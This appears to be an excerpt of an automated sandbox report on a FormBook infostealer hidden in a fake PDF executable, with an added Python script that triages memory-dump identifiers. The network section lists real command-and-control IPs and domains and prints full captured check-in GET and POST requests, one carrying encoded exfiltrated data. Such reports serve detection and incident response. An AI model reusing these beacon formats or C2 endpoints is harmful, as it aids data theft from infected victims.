                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aegBDZrMeWOlT.exe, 00000018.00000000.1385687295.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538536765.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp
                Source: Binary string: wntdll.pdbUGP source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NEW.RFQ00876.pdf.exe, NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdbGCTL source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp
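The Yara hits above are memory dumps, and the dump identifiers carry enough to say which process held the FormBook code and in what kind of memory. The Python below is an added example, not Joe Sandbox's code, and its reading of the identifier is inferred from this report rather than documented: field 0 agrees with the process index used in "15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack" (0x0F = 15) and in the "Binary string ... source:" lines that name each process, field 3 looks like a base address, field 4 matches the Win32 PAGE_* protection values (0x04 read/write, 0x40 execute/read/write) and field 6 the MEM_* region types (0x20000 private, 0x40000 mapped, 0x1000000 image); fields 1, 2, 5 and 7 are left undecoded. The index-to-name table is taken from this report only.

```python
"""Decode Joe Sandbox *.sdmp memory-dump identifiers and group the Yara hits by
process. Added example, not Joe Sandbox's code; the field layout is an
inference from this report (see lead-in), not a documented format."""
import re

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Index -> image, read off this report's "Binary string ... source:" lines, which
# pair each dumped process with its index (0x0F is the second NEW.RFQ00876.pdf.exe).
PROCESS_NAMES = {0x00: "NEW.RFQ00876.pdf.exe", 0x0F: "NEW.RFQ00876.pdf.exe",
                 0x18: "aegBDZrMeWOlT.exe", 0x1A: "msinfo32.exe", 0x1B: "aegBDZrMeWOlT.exe"}

DUMP_RE = re.compile(r"^([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp$")


def decode_dump_name(name: str) -> dict:
    """Split the eight dotted hex fields; assumed meaning: [0] process index,
    [3] base address, [4] PAGE_* protection, [6] MEM_* type."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a memory dump identifier: {name}")
    f = [int(x, 16) for x in m.group(1).split(".")]
    prot = f[4] & 0xFF                       # drop PAGE_GUARD / NOCACHE modifier bits
    return {"index": f[0], "process": PROCESS_NAMES.get(f[0], "unknown"),
            "base": f[3], "protect": PAGE_PROTECT.get(prot, hex(prot)),
            "type": MEM_TYPE.get(f[6], hex(f[6])),
            "executable": bool(prot & 0xF0)}  # any PAGE_EXECUTE* value


def triage(names) -> dict:
    """Per process index: image name, number of Yara hits, and how many of them
    sit in executable memory (where unpacked code actually runs)."""
    out = {}
    for n in names:
        d = decode_dump_name(n)
        s = out.setdefault(d["index"], {"name": d["process"], "total": 0, "executable": 0})
        s["total"] += 1
        s["executable"] += int(d["executable"])
    return out


# The eight FormBook Yara memory matches listed in this report's AV Detection section.
YARA_MATCHES = [
    "0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp",
    "0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp",
    "0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp",
    "0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp",
    "0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp",
    "0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp",
    "00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp",
]

if __name__ == "__main__":
    for n in YARA_MATCHES:
        d = decode_dump_name(n)
        print(f"{d['index']:3d} {d['process']:22s} {d['base']:#010x} {d['protect']:24s} {d['type']}")
    for idx, s in sorted(triage(YARA_MATCHES).items()):
        print(idx, s)
```

Under this reading, process 15 (the second NEW.RFQ00876.pdf.exe, the one the first instance spawned) holds FormBook at 0x400000 in private execute/read/write memory rather than in an image mapping, which is what a hollowed process looks like and fits the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures; msinfo32.exe carries the payload in three further regions. That is the process list to pull memory from first on a live host.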

                Networking

Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49766 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49811 -> 104.21.62.184:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49829 -> 104.21.62.184:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49851 -> 85.25.177.138:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49861 -> 85.25.177.138:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49845 -> 85.25.177.138:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49805 -> 104.21.62.184:80
Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49805 -> 104.21.62.184:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49868 -> 85.25.177.138:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49929 -> 173.236.199.97:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49945 -> 173.236.199.97:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49936 -> 173.236.199.97:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49923 -> 173.236.199.97:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49962 -> 203.161.42.73:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49968 -> 203.161.42.73:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 46.30.211.38:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 46.30.211.38:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 146.88.233.115:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 77.68.64.45:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 77.68.64.45:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 146.88.233.115:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50022 -> 172.67.145.234:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 81.2.196.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 46.30.211.38:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 217.160.0.200:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 77.68.64.45:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50017 -> 81.2.196.19:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49820 -> 104.21.62.184:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 146.88.233.115:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49984 -> 203.161.42.73:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 172.67.215.235:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 77.68.64.45:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 217.160.0.200:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 81.2.196.19:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50020 -> 172.67.215.235:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 81.2.196.19:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50009 -> 217.160.0.200:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 46.30.211.38:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 203.161.42.73:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 146.88.233.115:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 172.67.215.235:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50021 -> 172.67.215.235:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 217.160.0.200:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50023 -> 172.67.145.234:80
                Source: DNS query: www.zoiheat.xyz
                Source: DNS query: www.zoiheat.xyz
Source: Joe Sandbox View, IP Address: 146.88.233.115
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: PLANETHOSTER-8CA
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: INTERNET-CZKtis238403KtisCZ
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byl HTTP/1.1 | Host: www.zoiheat.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byl HTTP/1.1 | Host: www.questmatch.pro | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA HTTP/1.1 | Host: www.mrpokrovskii.pro | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /zu0o/?PHM8hj-=b+T4d2yBdzwUctMd/6rbp8e/L5VppQdPUeEaq4sP5cuMDP5lcr7xrt20xN8o8Q5MDPDMLZuxAQ7GazkQMM9RW/M6GCGyp3PrdvQ7twyTbIssAsfn0uYUlKbzmGUUwxyTqeuUq5+1WDkR&tHfx=9byl HTTP/1.1 | Host: www.kvsj.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+l HTTP/1.1 | Host: www.learniit.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byl HTTP/1.1 | Host: www.bankseedz.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/8 HTTP/1.1 | Host: www.dietcoffee.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /m1g9/?PHM8hj-=Cu+laRdL4iPyeXPNzSyuHz7Zauix7uTgmbFpChU/EeiHg3j+sEFT8Tsla6iUPxcW2Lx9lDY/eAXQyxZGKIZ6WavBUK62sZwr5lKAXnKNE4AVmzabioebOGd6nWTxCWiwwjsJNJ3z4u1Z&tHfx=9byl HTTP/1.1 | Host: www.smartcongress.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /8mom/?tHfx=9byl&PHM8hj-=v3XpYZPN786X74uq5rH/tUlQYCSKKJswOZfu2m4ZpmP7p96MXgDDjg6tIOsL1UDqFEVhH3VxTleyM0zNBIvLkhe6iRJHcqM7Dhz4vbv1gsAxBWEBkrF+OsuoFL7bmmLpMN9zG59B7XRp HTTP/1.1 | Host: www.carsten.studio | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl HTTP/1.1 | Host: www.krshop.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5q HTTP/1.1 | Host: www.rysanekbeton.cloud | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byl HTTP/1.1 | Host: www.airrelax.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global traffic | DNS traffic detected: DNS query: www.zoiheat.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.questmatch.pro
                Source: global traffic | DNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global traffic | DNS traffic detected: DNS query: www.sodatool.site
                Source: global traffic | DNS traffic detected: DNS query: www.tb0.shop
                Source: global traffic | DNS traffic detected: DNS query: www.kvsj.net
                Source: global traffic | DNS traffic detected: DNS query: www.learniit.info
                Source: global traffic | DNS traffic detected: DNS query: www.bankseedz.info
                Source: global traffic | DNS traffic detected: DNS query: www.dietcoffee.online
                Source: global traffic | DNS traffic detected: DNS query: www.smartcongress.net
                Source: global traffic | DNS traffic detected: DNS query: www.carsten.studio
                Source: global traffic | DNS traffic detected: DNS query: www.krshop.shop
                Source: global traffic | DNS traffic detected: DNS query: www.rysanekbeton.cloud
                Source: global traffic | DNS traffic detected: DNS query: www.airrelax.shop
                Source: global traffic | DNS traffic detected: DNS query: www.vayui.top
                Source: unknown | HTTP traffic detected: POST /1yxc/ HTTP/1.1 | Host: www.questmatch.pro | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Origin: http://www.questmatch.pro | Referer: http://www.questmatch.pro/1yxc/ | Content-Length: 220 | Connection: close | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 | Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 50 73 55 49 33 6c 67 63 2b 47 73 61 43 51 6b 49 61 35 63 43 41 57 70 64 45 4f 70 54 4c 2b 67 68 39 57 61 68 45 2f 72 77 50 52 35 54 32 4f 2f 52 75 42 47 34 74 4c 52 51 72 65 77 48 73 49 49 2f 77 46 78 38 2b 32 59 45 66 7a 50 4e 54 6c 6f 74 56 45 54 70 45 49 55 62 52 55 35 2b 46 66 63 72 71 6a 77 46 56 74 4b 69 55 75 4a 61 6f 2f 53 46 35 35 53 66 69 52 58 76 72 61 6a 35 65 75 6c 50 56 4f 66 53 4e 6d 47 48 30 72 32 66 70 52 2f 67 30 37 51 74 41 6c 65 31 64 47 7a 62 53 32 78 2f 44 65 68 33 75 2f 79 33 48 49 35 51 43 70 65 48 35 73 58 4d 62 31 31 74 33 75 36 67 75 41 37 70 36 49 70 75 77 3d 3d | Data Ascii: PHM8hj-=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtAle1dGzbS2x/Deh3u/y3HI5QCpeH5sXMb11t3u6guA7p6Ipuw==
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.1 | Date: Mon, 09 Dec 2024 05:56:58 GMT | Content-Length: 0 | Connection: close | X-Rate-Limit-Limit: 5s | X-Rate-Limit-Remaining: 19 | X-Rate-Limit-Reset: 2024-12-09T05:57:03.7011834Z
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:02 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
